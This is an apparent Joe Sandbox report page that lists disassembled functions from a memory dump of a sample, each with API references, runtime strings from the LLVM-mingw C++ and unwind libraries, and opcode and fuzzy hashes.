Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: > typena$ame $template
API String ID: 471065373-2892875084
Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction ID: fe557e421afb96a62c590adb7c7d76119d05ccdd9453d919cba25bcce1875378
Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction Fuzzy Hash: F1317CF2A06B9583EA29DF06E9841696762FB98BC0F148531CF9D477A5EF38D5928300

Function 00007FF6099CA260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CA298
realloc.MSVCRT ref: 00007FF6099CA2F7
realloc.MSVCRT ref: 00007FF6099CA37B

Strings

sizeof.., xrefs: 00007FF6099CA2AD
&, xrefs: 00007FF6099CA31C

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: &$sizeof..
API String ID: 471065373-1098962357
Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction ID: 63792dc823b4a6b55b2c5e9cb36a8f5ec52e1ea13dcb457704a5381488ad230c
Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction Fuzzy Hash: C0318FB2A06B8683DB259F56F4942ADB3A2EB647C4F548531DB8E47796EF3CE441C300

Function 00007FF6099CE920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CE970
realloc.MSVCRT ref: 00007FF6099CE9CB
realloc.MSVCRT ref: 00007FF6099CEA27

Strings

volatil, xrefs: 00007FF6099CE9DC
restric, xrefs: 00007FF6099CEA38

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction ID: 8b1abe2b4712361f884505044c9573e9627d152dcd8d40283222477c43410023
Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction Fuzzy Hash: 3A413EB2A06F8683DA29CF46E55426D7762EB94BC4F148431DB9E477A1EF3CE841C340

Function 00007FF6099B3D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6099B3E24
fflush.MSVCRT ref: 00007FF6099B3E7E

Strings

libunwind: __libunwind_seh_personality() LanguageHandler returned %d, xrefs: 00007FF6099B3E62
CCG , xrefs: 00007FF6099B3E0C
libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p), xrefs: 00007FF6099B3E05

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush
String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
API String ID: 497872470-3214979313
Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction ID: ced1a6f690dfb362ca5daab442c80db70365666785fc27852ee53d71f0c5e9c5
Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction Fuzzy Hash: 3A31A226E0974182EB10EF65E5453BD6372FB98780F284136DE8E87796EF3CD4458340

Function 00007FF6099CB468 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6099CB4FB

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099CB4EE
basi, xrefs: 00007FF6099CB4B2
starts_with(SV, "basic_"), xrefs: 00007FF6099CB4E7
basic_string, xrefs: 00007FF6099CB46D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
API String ID: 1222420520-1046023109
Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction ID: 0241fdda7b7d7966225820c9e4a2616e93093c74e9bbd98d910ed8935f1d7caa
Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction Fuzzy Hash: 59F0E9B1B0AA12C1E6608F08E880B3873A2EB58B74F78C330C52C83BD1DE2D9516C300

Function 00007FF6099CFBC0 Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6099CFED0: realloc.MSVCRT ref: 00007FF6099CFF80
Part of subcall function 00007FF6099CFED0: free.MSVCRT ref: 00007FF6099D0085

realloc.MSVCRT ref: 00007FF6099CFC66
realloc.MSVCRT ref: 00007FF6099CFD02
realloc.MSVCRT ref: 00007FF6099CFD6A
memcpy.MSVCRT ref: 00007FF6099CFD87
realloc.MSVCRT ref: 00007FF6099CFE6D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$freememcpy
String ID:
API String ID: 2038854750-0
Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction ID: b37f716ecac6c16000610693a70422762bb55a0b1887810332b8f3148f9d2521
Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction Fuzzy Hash: 3E9181A2A09A4692EF188F16D95437967A3FB69BC4F288831CF4D87796DF3CD456C300

Function 00007FF6099C4F60 Relevance: 7.7, APIs: 5, Instructions: 227COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C4FED
realloc.MSVCRT ref: 00007FF6099C506D
malloc.MSVCRT ref: 00007FF6099C50D6

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID:
API String ID: 454241450-0
Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction ID: 754ec965bf19226520b1e70d7f1c938052b1994116681cc9082eb10399175809
Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction Fuzzy Hash: 3971F6B2B0AB9582EB258F16E84466C7361EB58BC0F158531DF9D477A2DF3CE5928300

Function 00007FF6099C57A0 Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C5814
realloc.MSVCRT ref: 00007FF6099C58DE
realloc.MSVCRT ref: 00007FF6099C592D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction ID: 47e2e836bbda47d15c48fa8cad60b7608ad1427ad0fa2f5fd2ba6167c231af79
Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction Fuzzy Hash: A57186B2A0AB4582EA25CF56E99026DB362EB54BC0F55C431DF9E47792EF3CE491C300

Function 00007FF6099BF040 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BF0EA

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099BF8CE
Last != First && "Calling back() on empty vector!", xrefs: 00007FF6099BF8C7
struct, xrefs: 00007FF6099BF042
std, xrefs: 00007FF6099BF146

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
API String ID: 2803490479-3902771045
Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction ID: 6d858c81863022d8791cdd85bfcf101aa877de0a860f4c05315884caf3add96c
Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction Fuzzy Hash: CC31E562B0AA8245FB559F15DA4477927A6EB04FD0F298531CE5C8B3D2DF3CE592C310

Function 00007FF6099B4D90 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

cannot create thread specific key for __cxa_get_globals(), xrefs: 00007FF6099B4DF0
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF6099B4DBA
cannot zero out thread value for __cxa_get_globals(), xrefs: 00007FF6099B4E1F

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: Once$ExecuteInit
String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
API String ID: 689400697-2130391284
Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction ID: 4f66c5d461b31211257f055290a4597701beac6e9ed0a2449460f6ca16b0abfd
Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction Fuzzy Hash: 32213261E1A50282EA54AF56EE951B42377AF98390FB80930DE1DC67E3EE3CB555D300

Function 00007FF6099B6DB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099B6E40

Strings

+, xrefs: 00007FF6099B6EA5

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction ID: c368be71144239f12d96fe986ce7c91f3ff0b44cd0f2bf4d347be9040b120a42
Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction Fuzzy Hash: C451D86261C2864BE7748E25E25067E77B2EB51764F184139EB9A87BC6CF2CF511CB00

Function 00007FF6099D17D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099D1860

Strings

+, xrefs: 00007FF6099D18C5

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction ID: 45abf251af613c4a28d32260ab3df232778b0a82524029f836939d4def036983
Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction Fuzzy Hash: 9551B763A1D2424BE7388E25E19067EB7A2EB11790F184135EBDA87BC7DF2CE541CB00

Function 00007FF6099B8350 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B83AA
RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6099B84FA

Strings

libunwind: __unw_init_local(cursor=%p, context=%p), xrefs: 00007FF6099B83D0
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B83A3

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CaptureContextgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
API String ID: 2386080382-2955335536
Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction ID: aafcfbfe00b07066239e878969d83ee3f045185c499c72d00b24fb2b5be71535
Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction Fuzzy Hash: 85613F21909AC092F32A4B2CA5057F5B3B4FF94355F146221EFD912761FF3AA6E6C340

Function 00007FF6099D1336 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099D13A0
memset.MSVCRT ref: 00007FF6099D1431
fputc.MSVCRT ref: 00007FF6099D14A9

Strings

0, xrefs: 00007FF6099D1451

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$fputc
String ID: 0
API String ID: 2903701566-4108050209
Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction ID: ef643fdf721ec3c1bcd468a830ddd0ad78ad95323c837dabde7c60e31039eb8e
Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction Fuzzy Hash: 6F419F53E1E28246F77A4E2A95C43796693AF19794F2C9130CE6AD67D3EE3CE9408300

Function 00007FF6099B86C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B86ED
fflush.MSVCRT ref: 00007FF6099B8739

Strings

libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx), xrefs: 00007FF6099B8719
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B86E6

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
API String ID: 1137233558-2498214732
Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction ID: 5c7f2f5d7a81b0628238d82fb56af1069b06970fe231f115ca69e4cfcfcbd5f4
Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction Fuzzy Hash: FB319626A0D65541EB10DF1AE8502793766AF99FD5F284132CE5E437E2DE3CD886C300

Function 00007FF6099B29A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF6099B29B7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction ID: 775b64dd43175dc69b368bcbdfbd0c27f8fc92815d00ae9bfb484eff5f0ba559
Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction Fuzzy Hash: 50216B21E0E10241FA795B29979437D2163DF94764F3C8635CA2EC73DBDD6CA8C29241

Function 00007FF6099C149D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C16CB

